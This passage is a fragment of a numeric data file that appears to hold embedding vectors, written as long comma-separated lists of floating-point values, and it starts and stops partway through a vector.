0.030867008,-0.013332271,0.011624815,0.02747851,-0.012360536,-0.007927569,0.023524825,0.010140458,-0.009037279,-0.014691056,0.020264257,-0.022455104,0.01028411,0.0021936996,0.016973853,-0.0073279864,0.0002930043,-0.03396655,-0.0111506665,-0.019831184,-0.011985013,0.014894446,-0.02219911,0.0048938026,-0.0097956965,0.008316236,0.045697868,-0.014036746,-0.011905758,0.01719029,0.02226633,-0.01729029,0.009255831,0.014597853,-0.016904416,0.01750871,0.02609078,-0.0014313918,0.012682823,-0.0024997261,0.0033505214,-0.006110145,-0.00462126,-0.015151583,0.023615949,-0.0027133366,0.014076651,-0.008343366,-0.011968029,-0.008420637,0.0023129855,0.00028181178,-0.00960025,-0.024212034,0.030007817,-0.05338304,0.003631692,0.007439412,0.01284268,-0.0044690985,0.025688713,-0.032388166,-0.013323719,0.006142163,-0.008998298,-0.022545787,0.012862644,-0.009482742,0.0026163259,-0.0057359524,0.004034924,-0.025782159,-0.020680292,-0.013612388,-0.07376418,-0.013922836,0.0142534,-0.004283034,0.027721861,0.015106396,-0.007018227,0.0053471285,-0.02883989,0.017510183,-0.009616238,-0.010550855,0.0006977518,0.009368996,0.03077036,-0.017683053,0.0041980143,-0.0052576438,-0.0069846874,-0.033665672,-0.010305036,-0.019745508,-0.00929208,-0.0059518395,0.006569171,-0.00853778,-0.010766706,-0.023034979,0.014732631,0.0012845333,0.0072569493,0.00021918799,-0.009309548,-0.007787686,-0.020595094,-0.012504549,-0.015035166,0.013200908,0.012126552,-0.031568255,0.0030582962,-0.0058853547,-0.01291026,-0.009720271,-0.018084655,0.023459325,-0.03032266,-0.0009749248,-0.005223721,-0.004778987,0.0025379793,-0.00036565633,0.0014381824,0.021654975,0.018273957,-0.007942585,0.013640895,-0.00038230157,0.02051785,0.0007590158,0.0006286653,0.015914788,-0.0066475696,-0.005015015,-0.011348683,-0.017663874,-0.0014042824,0.024496384,-0.007402631,0.0054257377,0.026656017,-0.024304377,-0.004718902,-0.0255147,-0.010532158,0.02058544,-0.00033177919,-0.027397918,-0.013626421,-0.0035093364,0.02127311,-0.003597252,0.012290283,-0.00507145,-0.008466381,0.008409331,-0.013123607,0.012918304,0.010829131,-0.0025422534,-0.0034070686,-0.0011665311,0.032172892,-0.003311772,0.0018993973,0.008661566,0.017252691,0.006894046,-0.008116157,0.0042550527,-0.01596585,0.011375405,-0.00013916801,-0.0027361528,-0.021183444,-0.009881521,-0.01376442,-0.016287455,-0.015064661,-0.012148695,-0.015024959,0.044143524,0.054542,0.020849373,0.002342667,0.020296318,-0.008604484,0.02041513,-0.0077204546,-0.016479682,-0.01165376,-0.0076039783,-0.025962612,0.022297746,0.02050886,-0.00031560098,0.011405373,0.019195648,-0.0154132275,0.0068566306,-0.008610774,0.0053535034,0.0006250921,0.013246636,-0.013183765,0.019653833,0.026377754,0.016552236,0.0071134497,0.0063123633,0.022277864,-0.017776648,0.024117386,-0.013853812,-0.012616742,0.007347957,0.01866789,-0.0031856424,0.014300486,-0.016671112,-0.02258361,0.0055841575,-0.02145095,-0.007985624,-0.011085093,0.0043339604,0.007226058,0.01701555,-0.013499318,-0.01858509,-0.009407939,0.037155006,0.024486106,-0.008379304,-0.026017139,-0.011836988,-0.00075743464,-0.008995014,-0.0060581793,0.011479933,-0.039730623,-0.013789859,0.0070059635,-0.0029977956,-0.0144838905,-0.012608688,0.037452832,0.031964,-0.009482792,0.011277297,-0.03790908,0.008741402,-0.0061183046,0.0051026996,0.009050429,-0.0074022356,0.0031570718,-0.0015642657,0.014065178,-0.01274058,0.020471055,-0.016596496,-0.015528865,-0.013982389,-0.0032029198,-0.020666497,0.00003973512,-0.0067477385,-0.010651195,0.034898773,-0.012829981,0.02620924,-0.014636699,0.01543189,0.025568841,0.0032752673,-0.000271942,0.01446272,-0.006988782,-0.0002650641,-0.0071328655,-0.0061029997,0.024652682,0.1107486,0.00056128256,-0.0057770624,-0.0038130702,0.002210289,0.009924026,0.014024369,-0.0056446763,-0.014242407,0.017762545,0.026704762,-0.0057940027,0.00830737,-0.0053183082,-0.0041086366,0.023998005,0.019577216,-0.023481973,0.021290457,0.005904913,0.03183691,-0.028012061,-0.01954517,-0.029817859,-0.014089723,-0.067230426,0.03835067,0.02686002,0.004967197,0.026453938,0.0071545364,0.007577851,0.025157224,0.019624438,-0.010521379,0.0068689603,-0.001259059,-0.012203528,-0.003708007,-0.01221878,0.027486831,0.0019481083,-0.00022337378,-0.02400351,-0.012942998,-0.020213708,-0.01666639,-0.0074263862,0.009157304,-0.017939312,-0.0033238793,-0.0021251615,0.01864198,-0.0025783158,0.019611899,-0.014587353,0.0069137583,-0.0042464575,0.0022751712,-0.0069697197,0.0032479246,0.019516781,0.00003788612,0.002210596,0.016664447,0.00014872188,0.024549894,-0.016543008,-0.021016818,0.004729365,0.018714612,0.010568809,0.004481017,0.007918133,-0.008718207,0.012039578,-0.011904045,-0.0038680523,-0.011147751,-0.0022805827,0.014197609,-0.009000115,0.0066669164,0.01605169,0.006732337,0.008843483,-0.019988626,0.017650824,0.01969581,-0.008625618,-0.018798592,0.005717394,0.013927681,0.009029725,-0.0035599002,-0.0023442672,-0.00865939,-0.0034285022,-0.004703796,0.008275616,-0.009652485,-0.013712814,0.0013086322,0.025157984,0.018696213,-0.015159799,0.0021192473,0.033066742,0.00323012,0.0044637,-0.0026187135,0.006132613,-0.0043804673,0.01262912,0.0058458126,0.02916518,-0.028680312,-0.0075175148,0.024088776,-0.0123431,-0.0017064194,0.0024838701,0.007351016,0.033426065,0.016056852,0.014924266,-0.026381986,0.001596845,-0.015023378,0.005650814,0.0019751415,-0.020254072,-0.017842013,0.038572222,0.005230556,0.011215317,0.033564378,-0.007808543,0.029081715,0.0037232754,0.008447469,-0.02890817,0.000055860062,0.028953914,0.0078034634,-0.0013120661,0.037094034,0.014903948,0.0034267856,-0.0034519325,0.008114888,0.008741585,-0.007882582,-0.015419236,-0.021421807,-0.00391796,-0.016353317,-0.009574828,-0.004974263,-0.01613436,0.013236686,0.0056428276,0.029076124,-0.03999713,0.005869509,0.016505336,0.0056955065,0.01680174,0.014730461,0.015454768,-0.01951069,-0.004693355,0.007255951,0.007597997,-0.0071043405,0.010613838,0.010727095,0.024176978,0.0072724656,-0.003879095,-0.0009947707,0.019607274,-0.018864637,0.0047109416,0.020490956,0.0018844458,0.013133262,0.0065900804,-0.032075513,-0.0021268667,0.0028780478,0.005211065,-0.009360628,0.00048885355,-0.011048723,-0.0066613294,-0.016467715,0.026267795,-0.025180303,-0.0408999,-0.009040078,0.005897336,0.008303967,-0.014757276,0.0087843975,-0.01066366,0.007852508,-0.026450044,0.011965547,-0.033492234,0.013497578,-0.0031191292,0.003262806,-0.017802155,-0.0072477367,-0.0076752594,-0.000056726818,-0.018791104,0.0049209115,-0.01709872,0.014251452,0.012000102,0.0028697706,0.015241533,-0.01245061,0.0017187588,-0.016617471,-0.00277113,0.011191803,-0.044620026,-0.0131217055,-0.01891155,-0.0038617877,-0.012038681,-0.010209464,-0.013763497,0.015306998,0.014431557,0.010453295,0.012957803,-0.0062412596,0.0046316464,-0.0053721857,-0.008474976,-0.016210858,-0.004075339,0.004475248,-0.0036699313,-0.000016111791,-0.015313997,-0.04431248,-0.001524304,-0.031647842,-0.0148652755,-0.03178767,-0.015427968,0.007965061,0.01966438,0.029240921,0.0042554345,-0.0018470093,0.02494058,0.0008348383,0.027649732,0.0018780575,-0.006709577,0.01901054,-0.0025615485,-0.0113184145,-0.006251632,-0.00017567736,0.020814838,-0.013363981,0.016211275,-0.0061881496,0.017018378,-0.0071635223,-0.007045471,-0.00935301,0.017604627,-0.0044468106,-0.037519746,0.004519467,-0.020931887,-0.0014874908,-0.02035831,0.012518846,-0.0076802014,0.049084365,-0.069634944,-0.006100574,0.023911284,-0.0070711807,-0.034248937,0.019038633,0.023341179,-0.013450874,-0.0194583,0.022225728,-0.0145682255,-0.029166404,-0.02885975,-0.0020003202,0.0065912856,-0.010596858,0.0046951114,0.008683674,-0.0018835636,-0.021490842,-0.005875488,-0.0020340956,-0.0003521318,-0.023856148,-0.0005290581,-0.022524316,-0.015585572,0.007644253,-0.0057832855,0.015361197,0.0060817837,0.047821295,-0.037623685,-0.0011007406,0.019674098,-0.002232247,0.0279956,-0.008742735,-0.022399928,-0.022041747,-0.0134900035,-0.0013199354,0.0023084586,0.0064501064,-0.016353838,-0.033345237,0.019406406,0.0154736675,0.118433386,-0.02415743,-0.004029113,0.005151226,0.006977299,-0.005636396,-0.0017819519,0.014362082,0.008555846,0.013652308,0.01737334,0.009131549,0.0031060837,0.022013556,-0.013392845,0.010058041,0.0072548212,0.16327623,-0.0025409553,0.014829468,0.0060161543,0.009568806,0.0026172835,0.013166922,0.008160269,-0.055817574,-0.017673353,-0.031008042,-0.012926689,-0.00805584,-0.04569064,0.019126404,-0.0056440025,0.0038710095,-0.0019041118,0.009957275,0.012975859,0.0034847183,-0.0234284,-0.0004882961,0.0042760866,-0.011311906,-0.017216928,-0.019929742,-0.03135999,0.026330378,-0.017008003,-0.006622442,-0.003174943,0.043606568,-0.011883107,-0.011230777,-0.0028801577,0.034480862,0.018907996,-0.0047415006,0.020706464,-0.0041915798,-0.047014672,0.0075939912,-0.0109314285,0.0287179,-0.014675196,0.037315696,-0.0055350293,-0.012375911,-0.03378825,0.002893327,0.0007102954,0.029553927,0.0029017555,-0.004037907,-0.011481172,-0.009682349,0.036834754,-0.00039321222,-0.019514596,-0.0016260202,0.0063441307,0.0086231865,0.020092335,0.017247966,-0.021646785,-0.00006756897,-0.00022138076,0.009615513,-0.023481974,0.01440331,0.013647924,0.013694727,-0.027290942,-0.006583345,-0.012409626,0.014463679,0.026547752,0.03208959,0.008924372,-0.005301189,0.0065585403,-0.010323624,-0.005381217,0.012794225,-0.00022448353,-0.014429501,0.0139884995,0.015074278,-0.028431619,-0.031732216,0.0020151592,0.014933316,0.005334344,0.009505886,0.0012498861,0.0075772004,-0.0019839383,-0.00026444084,0.0010138474,-0.015492601,-0.041776594,0.002074001,-0.0087924255,-0.014063893,0.0012191351,0.020677812,-0.028790934,-0.009249258,0.016831484,0.004288912,-0.006592898,0.0118996585,-0.01890296,0.0011891576,0.0018399545,0.06446758,0.00060950615,-0.021990705,-0.011053627,-0.045881305,-0.04447621,-0.006743134,0.006439382,0.010661571,0.020329218,-0.004120248,-0.007236715,-0.011466564,0.016416708,0.006606779],[-0.0041993116,0.030436909,-0.019774143,-0.0234278,0.017766034,-0.0043281144,0.016704245,0.0378947,-0.023277393,-0.016744545,-0.013105801,0.0037867115,0.01785559,-0.009209832,-0.0030723037,0.0031936679,0.004642904,0.0010438095,-0.015006922,-0.012956642,-0.0010068271,-0.0038355428,0.001995195,0.0045618764,-0.006756221,0.002996968,0.0024560424,-0.0054352474,0.0018808938,-0.010910306,0.0075270855,0.029166782,0.0060919365,0.047990456,0.00082729285,-0.0043687546,-0.03775117,-0.009263065,0.011206291,-0.017029451,-0.024665507,0.0073891627,-0.018579189,0.008737809,0.03160254,-0.01770007,-0.013623348,-0.004984081,-0.024179196,0.013465597,-0.0006625416,0.0058793747,-0.05167817,0.009888499,-0.003758502,0.011724109,0.0075157005,-0.030753005,0.012272412,-0.045207407,0.0073952535,0.005465704,0.028914673,-0.022121867,0.014975084,0.006929531,0.004922841,-0.028927894,0.005717671,-0.023542894,0.017304793,0.011050367,-0.002567926,-0.012515078,0.029266063,0.013295392,0.002938519,-0.0132474685,-0.015568627,0.006948099,-0.0086109685,-0.005269327,0.0016363349,0.011102811,0.022909243,0.037008133,0.016426073,0.011031602,-0.01618418,-0.005818108,-0.015643954,0.01070141,0.012197351,-0.0003343828,-0.010063796,-0.0015401356,0.011766388,-0.0061912234,-0.008392218,0.006128668,-0.009303841,0.00004600587,-0.021298029,0.009726814,-0.0060752463,-0.023570878,0.0016487155,-0.019423978,-0.015004129,-0.02830931,-0.0025308428,-0.00013916574,0.0020185546,0.01832663,-0.019582015,-0.004397406,-0.009931816,0.019420799,-0.012165901,0.007640707,0.00025222672,0.016562823,0.02586843,-0.005278254,-0.022384739,-0.0000014260693,0.002028057,0.03727297,0.00020484718,0.014321799,-0.005454747,0.0009995096,-0.008116228,-0.009234612,0.0132086435,0.011093739,0.01559042,-0.0076889913,0.000791486,-0.012157543,0.03773572,-0.0019146116,0.015905887,0.00057503063,0.03344958,0.032404967,-0.00585985,0.01592268,0.01965679,-0.017987283,0.04924847,-0.0015461866,0.010583069,-0.020885816,0.016893135,0.04106655,-0.003613748,-0.025109615,-0.010252332,-0.03519016,-0.007820127,-0.0016331732,-0.0012196609,-0.0061397236,-0.0070484807,-0.02873379,-0.0027740633,-0.009037065,-0.009613194,-0.00048413352,0.019253798,0.029467363,0.01719095,0.011785315,-0.011594457,0.01659016,-0.02404885,0.00890971,0.012171207,-0.005845081,0.028823037,0.010872385,-0.021076687,-0.0137728285,-0.02543474,0.0023275786,0.013756728,0.036657795,-0.0157978,-0.018944696,0.0053795907,-0.0058934744,0.014392839,0.022758631,-0.019575367,-0.014088964,-0.033440914,0.052266486,-0.021510312,-0.0010148381,-0.013675544,-0.008604643,0.014773757,-0.04379597,0.00039808115,0.006694775,-0.004295327,0.004284195,0.004939864,0.010490457,0.013058108,-0.0066068983,-0.01987374,-0.016916534,-0.018789025,-0.0461788,0.039640475,-0.025293048,0.0048612426,0.004937964,-0.022074623,0.010619874,-0.002451801,-0.009717131,-0.0065956516,-0.018036919,-0.01986708,0.018310243,-0.016364263,-0.033946577,0.00059311464,-0.002372961,-0.02227858,0.00094064086,0.012349492,0.0040734005,-0.0012254098,-0.028796269,0.0076681143,0.017791139,-0.020256048,0.014721651,0.018534707,0.014531095,-0.014427697,0.018238451,0.00048508547,-0.009435574,-0.013658558,0.022634061,-0.027096031,-0.010235321,0.021128634,0.042550396,-0.006556295,-0.011213128,0.009307447,-0.0160549,-0.012903818,0.01060673,0.029533647,0.034266554,-0.01887494,0.03209995,0.030778423,-0.02002711,-0.014369283,-0.033408348,-0.0057187597,-0.033594336,-0.007412987,0.020264769,0.021314247,-0.018833488,0.017182307,-0.013971685,0.0029571676,-0.009220723,-0.011143392,0.00691628,-0.00032639925,0.015484466,0.00954875,-0.013347917,-0.0032075522,0.018068625,0.004399724,0.017340485,0.025928872,-0.016463412,0.0016292598,-0.020249708,0.02779642,0.011007254,-0.015407425,0.008902517,-0.021085856,0.035491165,0.016894253,-0.022955416,-0.005293297,-0.024263693,0.010893178,-0.021617658,-0.0032863494,-0.01797331,-0.016358951,0.03326829,-0.016126966,0.0030272927,-0.048894107,-0.015019674,-0.019378817,0.007138905,0.027483823,0.0033589657,-0.010933851,-0.003213137,-0.026160516,-0.005608693,0.009594978,0.0011796588,0.028001731,-0.008538025,-0.011947287,-0.0126175815,-0.011131301,-0.025734477,0.0071185464,0.007006426,-0.011673408,0.000019736064,0.019135779,0.029319806,-0.01306468,0.008800625,-0.0051064105,0.009335078,0.0049664653,-0.013682467,-0.008419964,-0.018927118,0.00057915965,0.003790529,-0.008450313,-0.0009769354,0.009581185,0.01042781,0.009023592,0.013502387,0.021387931,-0.012258632,-0.015717808,-0.0073504737,-0.0054499228,0.01070092,-0.020011382,-0.023621388,-0.00527016,0.00897066,0.044003807,-0.011052297,-0.013013326,0.005198667,0.059125476,0.009972078,-0.012264,-0.019548217,-0.019694945,0.01746572,0.023886194,-0.0068959375,0.0038427054,0.013900432,-0.01432189,0.013000779,0.0012206945,0.020427879,-0.021006564,0.010511515,-0.022678904,-0.025192145,-0.03551299,-0.006765511,-0.00050178956,0.021000838,0.002102461,0.013905833,0.027348002,0.03201187,0.030223846,0.006298282,0.010208862,-0.0330657,0.0028622618,0.003942699,0.026941221,0.015520793,-0.024528082,0.016022252,0.007034847,-0.004952606,-0.04144628,-0.0023322166,0.020332132,0.038526252,-0.02403006,-0.034812685,-0.0046285475,0.050032046,-0.01287746,-0.0027231101,0.0036924859,0.031966813,-0.004105895,-0.00706276,-0.0053209346,0.0020640697,-0.015185063,0.025065133,0.0036660149,-0.05910641,0.03685827,0.015459929,0.003480043,0.018406011,-0.0011209871,0.003937998,0.005730742,-0.012457005,-0.012883106,-0.017514309,0.0061224597,0.008817745,0.010396952,0.015101396,-0.008192776,0.0024798233,0.0045122197,0.007415875,0.0004254634,-0.005392285,0.014899683,0.034476884,-0.0050732717,-0.012959743,0.0014641418,0.012943616,0.011233985,-0.0044985726,-0.017466392,-0.009126331,0.017246732,-0.022169018,0.012958655,-0.0006525584,-0.0012298927,0.015130847,-0.0013341511,0.0018912933,0.016260142,0.012232425,0.007262197,-0.002519565,-0.0006289186,-0.0013090554,-0.0074623525,-0.01597976,0.0046047727,0.011116459,0.034478962,0.012228087,0.0054027466,0.05101468,-0.014182594,0.011069375,0.009158321,-0.011225956,0.01667333,-0.02690398,-0.018472182,-0.02017809,-0.004609509,-0.0036345134,0.021244925,-0.005683677,0.0018803924,0.00048552942,0.0015159257,-0.017708875,-0.015585914,-0.042163715,0.020902768,0.03410257,0.011050236,0.009253208,-0.005823771,-0.038309425,0.018958474,0.012737582,-0.007925984,-0.013139711,0.037898988,0.007901255,0.011795607,0.015832417,0.016069239,0.008043662,-0.0024670556,0.042210698,0.02558289,-0.011818202,-0.022666855,-0.0023163809,-0.023216309,0.002684304,0.00936933,-0.030030262,-0.0024930772,0.01164567,0.032423273,0.006093775,-0.01516455,-0.0010873525,0.015688913,-0.027930496,0.0051592826,-0.020910455,-0.008915965,0.027079048,-0.006950594,0.057084378,0.0027650523,-0.026697194,-0.01520027,0.0039223693,0.018396623,-0.008494869,-0.003843746,-0.029159775,0.0015613899,-0.017070815,0.026339615,-0.016347425,0.0017646231,-0.018569512,0.0055632642,0.013298431,-0.0010331405,0.005288809,-0.012290692,-0.011268866,-0.009689685,-0.021758158,-0.019642336,-0.014835393,0.033050053,0.01886268,0.006707758,-0.019213745,-0.020005878,-0.012763229,0.02789569,-0.0010101424,0.00093385886,0.00012158329,-0.009086094,-0.013092055,-0.0068784254,-0.0071402364,0.044442084,-0.0018250876,-0.017994987,-0.012254448,0.05071116,0.005103475,0.010009335,0.016059853,0.040014707,0.015242673,-0.008384105,-0.0013463473,0.012620546,0.0020302343,0.008905366,-0.012459478,0.012260365,-0.012774864,0.0045509925,-0.02455622,0.0028175777,0.022255847,0.0090209935,-0.030250814,-0.00037117905,-0.030255986,-0.038543127,0.001328739,-0.0052208984,-0.010436922,0.0013598516,-0.0049733487,-0.016665734,0.019567588,-0.006801177,-0.0075944387,0.015218075,-0.016322013,0.016941687,0.015194078,-0.0062342947,-0.006788583,0.008223464,-0.010162517,0.01886476,0.007264763,0.0009970701,-0.009805231,-0.0057084304,0.006257196,0.009142794,0.012158707,-0.0017973414,0.024716409,-0.013794352,0.019995714,-0.004514229,0.04112389,-0.026586313,-0.010503487,0.0133087775,-0.010088822,-0.0018168847,-0.012588366,0.032936886,0.0011223059,-0.008592456,0.00435997,-0.0016629727,-0.0098180575,-0.013939629,0.02951135,-0.03727743,-0.0022776185,-0.002355174,-0.004551824,-0.003154848,0.029703125,-0.025316834,0.0028319852,-0.009569666,-0.02397494,0.001024605,-0.010346253,-0.02902423,-0.016432833,0.023121782,-0.014600825,-0.029018497,-0.010303085,-0.017019281,-0.04171282,-0.02604558,0.029813055,0.020027183,0.005843454,0.0074601257,0.006898101,0.003803783,-0.009952006,0.018595356,-0.038740717,0.008473888,0.017586617,-0.046637483,0.027988898,-0.036520753,-0.0031140966,0.002955523,-0.010844817,0.0034561977,-0.015261389,0.015677452,-0.015854392,-0.035885613,0.01493483,-0.010074534,0.009473169,-0.028092418,0.0038437762,0.0022792106,0.0061283507,0.0097285835,0.0051050526,0.0097465245,-0.0028247107,-0.014829332,0.004773756,0.015302976,0.035945974,0.0048245694,0.018986128,-0.0025286234,-0.009082068,0.0072255046,-0.018882643,-0.00004316906,0.040112235,0.00036996277,-0.0107458215,0.006559463,-0.031868987,0.015302601,-0.018702146,-0.04078318,-0.016706642,0.00201705,0.015126288,0.006624753,0.03004255,-0.0131511185,0.0071086604,-0.0052036685,-0.0026332943,-0.026123397,0.039083015,0.002054085,-0.011086028,0.01430471,0.0020263651,-0.0030796127,-0.00029190007,0.0040838723,-0.024942689,-0.006099684,-0.023023423,0.0071483897,-0.030449672,-0.005731071,-0.043784995,0.0136860125,0.028225923,0.010765359,0.01857577,-0.020757833,0.018247217,-0.023903793,-0.007526622,-0.021523762,-0.031252287,0.011009025,0.032800682,-0.04738455,0.026452811,0.0130658,-0.0014625309,-0.012524421,0.004479801,-0.0052526398,-0.021255074,0.024739215,-0.010144822,0.010941169,0.0006716665,0.02232738,0.0068128747,-0.0016281349,-0.013394934,0.0016075361,-0.009087196,0.015890632,0.011511238,0.0013224789,-0.004420264,0.014093597,-0.044089157,-0.009012298,0.0026237662,0.0177519,-0.04462494,-0.000029665327,0.0071721133,0.002828063,-0.0021283661,0.02489321,-0.01979288,0.02848018,0.024973499,-0.03857568,-0.0027435243,-0.012899716,-0.010421221,0.025099479,0.032542843,-0.002998941,-0.03925413,-0.0074759647,0.03329168,-0.009970203,0.045208637,0.004892138,-0.029832495,-0.023070572,-0.039288517,-0.0020628264,-0.017701685,0.000078898585,0.008097559,-0.017991979,0.028051753,-0.018974748,0.0065066074,0.009876807,0.012587476,0.015252291,0.01645307,-0.00068055245,-0.03913389,0.018152457,-0.006525893,-0.011900083,-0.043621972,0.00920231,-0.028649097,-0.0019133089,-0.026301134,-0.012241609,0.0034197478,-0.0034173166,0.012954982,-0.010324794,-0.01687169,0.013235941,0.004998069,0.025566474,-0.008215974,-0.017722769,0.0017954154,-0.0050624507,0.02460565,0.017425524,-0.019755084,0.042563844,-0.00532773,-0.000033121243,0.00682098,-0.005844006,-0.000894562,0.01610755,0.013498456,0.003452096,-0.028916901,0.031976476,-0.017672127,0.001681534,0.04360914,-0.0024332665,-0.008019516,-0.01993681,-0.02782361,-0.0067772116,-0.0017284772,0.030185075,-0.024596306,0.01273731,0.00638681,-0.025912296,0.0041904366,0.016442664,0.005704479,-0.006649383,-0.012820646,0.032201223,-0.004883556,-0.026997156,-0.002423958,0.010764216,0.0029700254,0.0030807292,0.0069223065,0.021752778,0.0069609303,0.015345262,-0.0012847871,0.004455182,0.008828362,-0.005099153,0.018087538,-0.013252198,0.037858874,-0.0021116864,0.002987533,0.011148016,-0.024359386,-0.018773282,0.010773102,-0.008661753,0.011682513,-0.04184058,0.0073779314,-0.014200538,-0.011517851,0.018315678,-0.0041811797,0.007070966,-0.024473112,-0.005816335,-0.009418124,0.0008006647,0.012343388,0.0019868033,-0.02732066,-0.012574537,0.014008451,-0.014857904,0.012916157,0.00067030854,-0.023456635,0.0022657309,-0.0038562573,0.004006786,-0.010881673,-0.0039073844,0.0121971015,0.041980453,0.020507066,0.012165021,-0.011878258,-0.036445122,-0.02202341,-0.008512717,-0.023590503,0.002452817,0.010830186,0.011457247,-0.017168809,-0.008162237,-0.010908964,-0.03555935,0.047568005,-0.051371165,-0.019868432,0.007415314,-0.00027777714,-0.012106085,0.010521011,0.026382385,-0.0070682946,0.019746117,-0.010867527,0.0021847808,0.0017038313,0.007697863,0.0013470931,-0.005590552,0.02877958,0.04652004,0.006957309,0.020621575,-0.010698394,0.013045097,-0.02759346,0.016899707,0.031850003,-0.02385596,0.004836033,-0.016572082,0.0048860046,0.000500964,-0.007658574,0.0046250145,-0.0011092591,-0.018394504,-0.017134087,-0.0017829658,0.01028453,-0.026176676,0.0023027437,-0.021777336,0.0006649648,-0.0026743235,0.030243881,-0.007721102,-0.023415351,-0.009145672,-0.008339586,-0.0011962923,-0.001662631,0.033428438,0.002114578,-0.018670885,0.006463613,0.01678438,0.016929826,-0.0031997878,0.01651131,0.0031579498,0.005821167,-0.014059519,0.0048917993,-0.011650679,0.025245123,-0.028796984,0.00083136774,-0.029664773,0.034346394,-0.0081546055,-0.013701037,-0.023821795,-0.024456918,-0.02034448,0.011253573,-0.037026472,0.0051116985,-0.04105378,-0.006258041,-0.003621563,-0.05072199,-0.0111711435,0.001689426,-0.03434997,0.0056195324,-0.022522436,-0.021566087,0.0084126,-0.00951429,-0.0051653017,-0.012442504,-0.0067322953,-0.0026953653,0.0042375964,0.01861802,0.010936493,0.01222224,0.008268777,-0.0022302535,0.0038710288,-0.011184607,-0.013617702,-0.022111913,0.009452118,0.033108134,0.019409746,0.00056178385,-0.00072961726,0.008770101,0.0076898998,0.020414297,0.0075742532,0.020615967,-0.01394603,-0.014346323,0.0024986663,0.0038281237,0.0070990287,0.011667013,0.012706143,0.035158634,0.017980136,-0.002513168,0.025469365,0.018395023,-0.0020035962,0.020872263,0.022211786,0.0052931937,-0.026525475,0.029382208,-0.0074071647,0.051778685,0.02898157,0.0010493788,-0.0011815665,0.014779291,-0.005396575,-0.017165849,-0.003021952,-0.013493512,-0.014869079,-0.026666114,-0.003061652,-0.0035599773,0.030437702,-0.014991947,0.0020758621,0.019242069,-0.00851322,0.0009337064,-0.004451663,-0.014625266,0.0045168013,0.017932132,0.015492622,-0.005937992,-0.013332119,-0.019003058,0.013420199,0.00964485,-0.002159392,-0.010151232,0.0133925155,0.0133504,-0.012834255,0.004857356,-0.008102944,0.015650198,-0.0023575108,-0.003827964,-0.0035027508,0.013625674,-0.01588712,0.027956778,0.006321898,0.0011057435,0.018236127,0.011533711,-0.0039896644,-0.00671686,0.00830241,0.036524847,0.007841361,-0.007772302,-0.037152786,-0.011971952,-0.014084944,-0.009462973,0.008510416,-0.0190627,0.01764254,-0.0007352052,0.003260686,-0.013809549,-0.029596856,0.03332327,-0.017842738,0.036180623,-0.01861841,-0.015929671,-0.003486568,0.0064145545,0.038351536,-0.008405423,-0.0019236426,-0.015646735,0.013255958,-0.009143043,0.016685585,-0.014640637,0.006309299,0.01175868,-0.003598047,-0.030884815,-0.015602219,0.0055871545,-0.010137234,-0.006847966,0.01990937,-0.026946848,0.014586852,0.02129275,0.009400913,0.00884595,0.0013320417,-0.018045451,0.032106254,-0.011590671,0.0027428046,-0.0011035354,-0.00086403877,-0.00805658,0.035497583,0.03316101,-0.021237932,-0.00024710604,0.0019761047,0.016618516,0.007820387,0.0022058089,0.01622749,0.014746692,0.016964624,-0.00627168,-0.015561596,0.002197181,-0.009831907,0.011026183,0.012989533,0.036888093,-0.015532128,0.007655473,0.0068752267,-0.004880709,-0.02941369,-0.011799697,-0.0045981454,0.004619422,0.014870031,-0.008441683,-0.010615382,0.0020503048,-0.0126458155,0.0073975124,0.009474404,0.021520777,-0.01228111,0.020669153,0.023167051,0.012589829,0.007849874,-0.0041758013,-0.011419356,0.004157641,0.01136984,0.009926593,-0.023047123,-0.006336654,0.007896425,0.028258145,0.015137437,0.0124945035,-0.011202354,-0.040940754,0.018802471,0.010132059,0.009943544,-0.015676605,0.014816396,-0.014399112,-0.018496737,-0.005747895,0.0058130273,0.01742893,0.016337218,0.024980253,-0.013162839,-0.008803264,-0.00050237094,-0.029791243,0.019592397,0.019296717,0.007794543,-0.023022098,0.04185451,-0.0068359007,0.010875123,0.010647379,0.028721081,-0.00977711,-0.038309325,-0.028751887,-0.0144558055,-0.028885713,0.014993681,-0.0011096642,0.008526553,-0.004696282,-0.0027381945,0.04944933,-0.008423729,-0.004426558,-0.009561705,0.0033798567,-0.0012490465,0.015200846,-0.00265867,-0.020236753,0.02450238,-0.015851544,0.0060561923,-0.03473207,0.023778824,0.025355034,-0.019985203,-0.004846345,0.0042371736,-0.0056951414,-0.030968444,-0.011937126,0.011851531,-0.009262113,0.030265559,-0.011851695,-0.00654339,-0.011337167,0.01016383,0.007327326,0.0151577275,-0.01603279,0.023403334,0.008071506,-0.01905162,-0.00027880614,0.0044371486,0.010771255,0.005493563,-0.005550399,0.0099693,-0.023435613,0.0036171714,-0.016580975,-0.011854289,0.023702772,-0.0056315474,-0.008352249,-0.010924714,-0.0109721245,0.015860107,-0.02761235,0.009327706,0.008217363,0.00280111,0.02547175,0.018907677,-0.008100089,0.005685861,0.011363627,0.004550415,0.009249935,0.0015883595,-0.019624885,0.032644216,0.014283477,-0.02858396,0.015039528,0.0023391445,-0.013051786,0.07359757,-0.006664141,-0.021235945,-0.00779459,0.018190965,0.04652787,0.03370003,0.0040481943,0.010724786,-0.003111648,-0.005889836,0.019120751,-0.02187734,-0.00037680828,0.0073366635,0.009147328,0.033206243,0.009952168,-0.015895542,-0.00077597954,-0.012218111,0.009635097,0.009638362,0.017373387,0.0009256128,0.02285045,0.0036948374,0.014347734,0.01870216,0.000019054654,-0.0107702045,0.01143414,0.0041796914,0.007806824,-0.01015675,-0.036679693,-0.007731805,0.0681285,-0.002653609,-0.013112051,0.01897612,-0.0008979006,0.002494313,-0.07033501,0.024979357,-0.0044899504,-0.016135179,-0.008282819,-0.009594556,-0.009570733,0.019093355,0.011556643,0.0064466894,-0.017305696,-0.0068058386,0.004328139,-0.0076135215,-0.0126605015,0.021083757,-0.023420582,-0.01445392,-0.04997174,0.0018577497,-0.011987182,0.0054337415,-0.004397105,-0.005410793,-0.01743804,-0.010165318,0.01000005,0.012608169,-0.015129475,0.016164778,-0.009922269,0.022568107,0.014657807,0.019850044,0.011552914,0.016528562,-0.007566865,-0.047322895,-0.09547219,-0.0060185622,0.0005416329,-0.04664921,0.0370351,-0.031558182,-0.003760632,-0.014922138,0.018314742,-0.010698168,0.013444768,0.0024349731,0.0010138899,0.018806564,0.011079907,0.007881793,0.021875177,0.016563052,0.0043765586,0.015413141,0.0146866655,0.007870038,0.005131959,-0.015604423,-0.02217686,0.0073396084,0.0029355679,0.038306586,-0.014826155,0.014680559,-0.011905999,0.032690253,-0.028720368,-0.010182371,-0.0063986154,-0.0247443,0.008162505,-0.00086191104,-0.007376064,0.012172172,0.007177204,0.008153168,0.016823135,-